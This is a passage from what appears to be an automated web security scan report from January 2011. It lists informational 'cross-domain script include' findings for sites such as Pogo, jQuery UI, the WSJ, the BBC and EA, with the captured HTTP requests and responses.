<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

17.45. http://game3.pogo.com/error/java-problem.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/error/java-problem.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://www.java.com/js/deployJava.js

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:41 GMT
Server: Apache-Coyote/1.1
Content-Length: 6737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Game loading error
   </title>



...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...

17.46. http://game3.pogo.com/exhibit/game/game.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/game/game.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/scrabble.pogo/game;dcopt=ist;g=1;tile=1;sz=728x90;ord=740014?

Request

Response

17.47. http://game3.pogo.com/exhibit/intermission.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/intermission.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/scrabble.pogo/inte;dcopt=ist;g=1;tile=1;sz=500x350;ord=13204?

Request

Response

17.48. http://game3.pogo.com/exhibit/loading/loading.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/loading/loading.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/scrabble.pogo/load;dcopt=ist;g=1;tile=1;sz=500x350;ord=106931?

Request

GET /exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

17.49. http://game3.pogo.com/exhibit/loading/loading.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/loading/loading.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/scrabble.pogo/load;dcopt=ist;ag=af41;g=0;tile=1;sz=500x350;ord=910319?

Request

GET /exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

17.50. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 14616

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

17.51. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js
http://static.jquery.com/ui/themeroller/scripts/app.js

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.52. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js
http://github.com/malsup/form/raw/master/jquery.form.js?v2.44
http://malsup.github.com/chili-1.7.pack.js

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:51 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://github.com/malsup/form/raw/master/jquery.form.js?v2.44"></script>
...[SNIP]...

17.53. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/article/SB10001424052748704415104576066830729058232.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://adsyndication.msn.com/delivery/getads.js
http://stags.peer39.net/712/trg_712.js

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:21:36 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST
Cache-Control: max-age=15
Expires: Sun, 09 Jan 2011 01:21:51 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=46
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 139880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://stags.peer39.net/712/trg_712.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328?

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d291cb6,8587812540,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=8587812540?

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 02:25:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.906164.758630.0XMC
Set-Cookie: C2=2yRKNJpwIg02FlBCdbdRZA7gHw8jGHgsjhADgaUK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:57 GMT; path=/
Set-Cookie: F1=BYLHp0EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:57 GMT; path=/
Set-Cookie: BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWqWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:57 GMT; path=/
Set-Cookie: ROLL=v5Q2V0cRVUyqFZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:57 GMT; path=/
Set-Cookie: 52607936=_4d291cb6,8587812540,758630^906164^1^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 09 Jan 2011 02:25:57 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 595

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13;sz=160x600;click=http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d291cb6,8587812540,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=8587812540?">');document.write('<\/SCRIPT>
...[SNIP]...

17.56. http://revver.com/video/426755/peanut-labs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://revver.com
Path:	/video/426755/peanut-labs/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /video/426755/peanut-labs/ HTTP/1.1
Host: revver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:32:22 GMT
Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3
Expires: Sun, 09 Jan 2011 02:33:33 GMT
Vary: Cookie
Last-Modified: Sun, 09 Jan 2011 02:28:33 GMT
ETag: b8fdf6d76062d0f9cc23a77e2e8edebb
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 81237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

17.57. http://themeforest.net/user/freshface/portfolio previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://themeforest.net
Path:	/user/freshface/portfolio

Issue detail

The response dynamically includes the following scripts from other domains:

http://0.envato-static.com/javascripts/webtrends/webtrends.js?1294275215
http://2.envato-static.com/javascripts/envato.min.js?1294275215
http://2.envato-static.com/javascripts/webtrends/webtrendsasyncloader.js?1294275215
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /user/freshface/portfolio HTTP/1.1
Host: themeforest.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 09 Jan 2011 02:28:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "7d3f05bdfbd104cc41cd574e20733696"
X-Runtime: 174
Content-Length: 34838
Set-Cookie: referring_user=-1; domain=.themeforest.net; path=/; expires=Sat, 09-Apr-2011 03:28:47 GMT
Set-Cookie: _fd_session=BAh7BzoUcG9zdF9zaWduaW5fdXJsIjRodHRwOi8vdGhlbWVmb3Jlc3QubmV0L3VzZXIvZnJlc2hmYWNlL3BvcnRmb2xpbzoPc2Vzc2lvbl9pZCIlMjE0MjRhNzMxMWQ0MzcxMGU2YzU3ODY1MDNjM2EzOGQ%3D--d7f2ff8f0d287190348429cb42e2ca4e35b99358; path=/; expires=Tue, 08-Jan-2013 14:28:47 GMT; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="h
...[SNIP]...
</script>

<script src="http://2.envato-static.com/javascripts/webtrends/webtrendsasyncloader.js?1294275215" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>

<script type="text/javascript" src="http://2.envato-static.com/javascripts/envato.min.js?1294275215"></script>
...[SNIP]...

<script src="http://0.envato-static.com/javascripts/webtrends/webtrends.js?1294275215" type="text/javascript"></script>
...[SNIP]...

17.58. http://word-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://word-games.pogo.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=139259?
http://connect.facebook.net/en_US/all.js
http://www.googleadservices.com/pagead/conversion.js
http://www.java.com/js/deployJava.js

Request

Response

17.59. http://wordpress.org/extend/plugins/wp-pagenavi/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/wp-pagenavi/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://s.gravatar.com/js/gprofiles.js

Request

GET /extend/plugins/wp-pagenavi/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 Jan 2011 02:29:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 23436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.gravatar.com/js/gprofiles.js"></script>
...[SNIP]...

17.60. http://www.adobe.com/special/offers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/special/offers.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/widget.php?v=10

Request

GET /special/offers.html HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:27:39 GMT
Server: Apache
Cache-Control: max-age=21600
Expires: Sun, 09 Jan 2011 11:27:39 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="EN" ><!-- In
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/widget.php?v=10"></script>
...[SNIP]...

17.61. http://www.adobe.com/training/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/training/

Issue detail

The response dynamically includes the following script from another domain:

http://admin.ethnio.com/app/screener/jss.php?scid=776_1729

Request

GET /training/ HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:27:11 GMT
Server: Apache
Cache-Control: max-age=21600
Expires: Sun, 09 Jan 2011 11:27:11 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding, User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</script>

<script language="JavaScript" src="http://admin.ethnio.com/app/screener/jss.php?scid=776_1729" type="text/javascript"></script>
...[SNIP]...

17.62. http://www.bbc.co.uk/news/technology-12126880 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bbc.co.uk
Path:	/news/technology-12126880

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://js.revsci.net/gateway/gw.js?csid=J08781
http://news.bbcimg.co.uk/js/app/bbccom/19_33/vs.js
http://news.bbcimg.co.uk/js/app/bbccom/19_37/bbccom.js
http://news.bbcimg.co.uk/js/app/bbccom/19_39/s_code.js
http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js
http://news.bbcimg.co.uk/js/config/apps/4_3/bbc_fmtj_config.js
http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js
http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js
http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js

Request

GET /news/technology-12126880 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:38:36 GMT
Keep-Alive: timeout=10, max=797
Expires: Sun, 09 Jan 2011 01:38:36 GMT
Connection: close
Set-Cookie: BBC-UID=048d5239a18139fc2bddb11a61903f97169352767050f19f02f9f6849e4a283c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=048d5239a18139fc2bddb11a61903f97169352767050f19f02f9f6849e4a283c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_3/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_37/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_33/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_39/s_code.js"></script>
...[SNIP]...

17.63. http://www.e00.peanutlabs.com/js/iFrame/sc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/js/iFrame/sc.php

Issue detail

The response dynamically includes the following script from another domain:

https://amch.questionmarket.com/dt/s/25387/0.php

Request

Response

17.64. http://www.ea.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js

Request

GET / HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.65. http://www.ea.com/hasbro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/hasbro

Issue detail

The response dynamically includes the following script from another domain:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js

Request

GET /hasbro HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.66. http://www.ea.com/ipad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/ipad

Issue detail

The response dynamically includes the following script from another domain:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js

Request

GET /ipad HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.67. http://www.ea.com/iphone previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/iphone

Issue detail

The response dynamically includes the following scripts from other domains:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://widgets.twimg.com/j/2/widget.js

Request

GET /iphone HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:42 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=18e0qmhkmneofnmkng5qlhs1k4; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74885

